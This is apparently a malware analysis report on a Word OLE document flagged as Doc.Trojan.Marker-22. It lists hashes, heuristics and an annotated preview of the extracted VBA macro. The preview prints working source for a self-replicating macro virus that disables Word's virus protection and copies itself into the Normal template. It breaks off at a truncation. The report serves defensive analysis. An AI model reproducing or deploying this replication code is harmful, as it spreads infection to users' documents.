Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86b3a21b5122e017…

MALICIOUS

Office (OLE)

53.5 KB Created: 2001-03-02 18:18:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-10
MD5: 90855a502a585ee71f8ad920d2256da8 SHA-1: 0b0ff1740a2ea547d5a954908bd61c5e4b113ef1 SHA-256: 86b3a21b5122e017d68a087a9cc802bb914bc5e30e8ceecae4c2ef98b64220e7
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a Document_Open VBA macro (a Document_Close handler with the same logic is also present). The macro looks for its marker string in both the open document and the Normal template, switches Word's VirusProtection option off, writes its own module source to C:\Version.dat, and then copies that source in whichever direction is not yet infected: from the document into the Normal.dot template (deleting the template's existing modules first and saving it) or from the template back into the open document. The ClamAV heuristic also flags the extracted macro as Doc.Trojan.Marker-22, supporting the malicious classification.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 54,784 bytes but its declared streams total only 16,490 bytes — 38,294 bytes (70%) reside in unallocated sector slack. This region is the classic hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure); on its own, however, the size of the slack does not show that such a payload is present, and the region should be examined directly before drawing that conclusion.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8158 bytes
SHA-256: 0e6e57fb0b8480e7c5935a2c4eccddb1bcce01d74adc5347908d1da7314638a0
Detection
ClamAV: Doc.Trojan.Marker-22
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: the Attribute lines above are the module header emitted when the
' ThisDocument class module is exported (here by olevba). VB_Base = "1Normal.ThisDocument"
' together with VB_TemplateDerived = True is consistent with a module derived from the
' Normal template, which matches the Normal.dot infection logic in the procedures below.
' Analyst note: self-replicating macro virus (Word 2000 / VBA 6 era). On open it
' copies its own module source between the active document and the Normal template,
' in whichever direction has not yet been infected. Host indicators observed in this
' procedure: the file C:\Version.dat, the marker string "<- this is a new killer 2!"
' in module text, and Options.VirusProtection being switched off.
Private Sub Document_Open()

    ' Every runtime error is suppressed, so a failed step (file locked, VBProject
    ' access denied, Kill on a missing file) never surfaces to the user.
    On Error Resume Next
    
    ' Infection marker. This Const line itself contains the string, so the
    ' CodeModule.Find calls below match any module that carries this macro.
    Const Marker = "<- this is a new killer 2!"
    
    ' prevDocument / nextDocument are assigned but never used in this procedure.
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
    'Declare Variables
    ' VBA gotcha: only the last name on each Dim line receives the declared type;
    ' the others are Variant. SaveDocument, SaveNormalTemplate, UserAddress, LogData
    ' and LogFile are declared but never used here.
    Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Dim ad, nt As Object, iCount As Integer
    Dim OurCode, UserAddress, LogData, LogFile As String
    
    'Initialize Variables
    ' First VBA component of the open document and of the Normal template.
    ' NOTE(review): in later Office versions this VBProject access is blocked unless
    ' "Trust access to the VBA project object model" is enabled — a useful hardening
    ' control against this propagation technique; confirm for the target version.
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    
    ' Find returns True when the marker occurs anywhere in lines 1-10000 of the module,
    ' i.e. when that side already carries this macro.
    DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    
    
    'Switch the VirusProtection ON
    ' The original comment above is misleading: this assignment turns Word's macro
    ' virus protection warning OFF, so later macro-bearing documents open silently.
    Options.VirusProtection = False
    
    'write to file
    ' Direction 1: the open document is infected -> infect the Normal template.
    If DocumentInfected = True Then
        ' Export this module's full source to a fixed drop path (file number #1 is
        ' hard-coded; if channel 1 is already open the Open fails and is swallowed).
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        ' Wipe every module in the Normal template (i is implicitly declared; there
        ' is no Option Explicit in this module).
        iCount = NormalTemplate.VBProject.VBComponents.Count
        For i = 1 To iCount
            NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.CountOfLines
        Next i
        
        ' Commented-out earlier variant. A trailing "_" inside a comment does not
        ' continue it, so the following line is presumably parsed as a standalone
        ' statement rather than part of the comment — verify; any error it raises is
        ' suppressed by On Error Resume Next.
 '       NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
                                NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        ' Import the dropped source into the template and persist it: every document
        ' created from or opened with Normal.dot afterwards carries the macro.
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile "C:\Version.dat"
        NormalTemplate.Save
        
    End If
    
    ' Direction 2: the Normal template is infected -> infect the open document.
    If NormalTemplateInfected = True Then
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        ' Inconsistency in the original: iCount is taken from the template's component
        ' count, but the loop deletes modules of the active document.
        iCount = NormalTemplate.VBProject.VBComponents.Count
        For i = 1 To iCount
            ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(i).CodeModule.CountOfLines
        Next i

        ' Same commented-out variant as above; the continuation line is again outside
        ' the comment.
        'ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
                                                    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        ' The open document is modified on disk, so the file itself becomes a carrier.
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile "C:\Version.dat"
        ActiveDocument.Save
    End If
End Sub

Private Sub Document_Close()

    On Error Resume Next
    
    Const Marker = "<- this is a new killer 2!"
    
    'Declare Variables
    Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
    Dim ad, nt As Object
    Dim OurCode, UserAddress, LogData, LogFile As String
    
    'Initialize Variables
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    
    DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    
    
    'Switch the VirusProtection ON
    Options.VirusProtection = False
    
    'write to file
    If DocumentInfected = True Then
        Kill "C:\Version.dat"
        Open "C:\Version.dat" For Output As #1
        OurCode = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Print #1, OurCode
        Close #1
        
        iCount = No
... (truncated)